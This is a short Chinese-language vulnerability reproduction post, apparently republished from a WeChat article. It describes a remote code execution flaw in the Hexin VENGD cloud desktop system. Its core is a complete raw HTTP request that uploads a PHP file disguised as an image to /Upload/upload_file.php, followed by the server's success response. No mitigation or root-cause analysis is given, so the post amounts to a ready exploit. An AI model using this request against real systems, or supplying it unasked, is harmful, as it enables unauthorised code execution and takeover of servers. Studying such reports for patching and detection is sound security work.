和信下一代云桌面远程代码执行漏洞复现
2021-04-27 00:38:09 Author: mp.weixin.qq.com(查看原文) 阅读量:88 收藏

漏洞描述

和信下一代云桌面系统(VENGD),是国内的基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,它融合了VDI、VOI、IDV三大架构优势,实现了前后端混合计算,在调度服务器后端计算资源的同时更能充分利用前端资源,HVV活动中出现此漏洞。

漏洞编号

利用类型

远程

漏洞分类

  • php

适用版本

标签

  • php

  • CMS

  • RCE

发布日期

2021.04.19

漏洞等级

高危

漏洞原理

暂无

漏洞利用

利用脚本

暂无

利用方法

POST /Upload/upload_file.php?l=test HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 184

------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="test2.php"
Content-Type: image/avif

<?php phpinfo(); ?>
------WebKitFormBoundaryfcKRltGv--
HTTP/1.1 200 OK
Date: Mon, 26 Apr 2021 15:00:16 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 18
Connection: close
Content-Type: text/html; charset=UTF-8

_Requst:<br>

利用过程

参考链接

  • https://www.seebug.org/vuldb/vulnerabilities?has_poc=true

  • https://blog.csdn.net/weixin_44146996/article/details/115611026


文章来源: http://mp.weixin.qq.com/s?__biz=MzI0Nzc0NTcwOQ==&mid=2247484933&idx=1&sn=07a1d312b29f894649dae919306558df&chksm=e9aa1bc7dedd92d1f6e542ed2be57290d00149ad02ec1d37a81a31a9611c100730597960c720#rd
如有侵权请联系:admin#unsafe.sh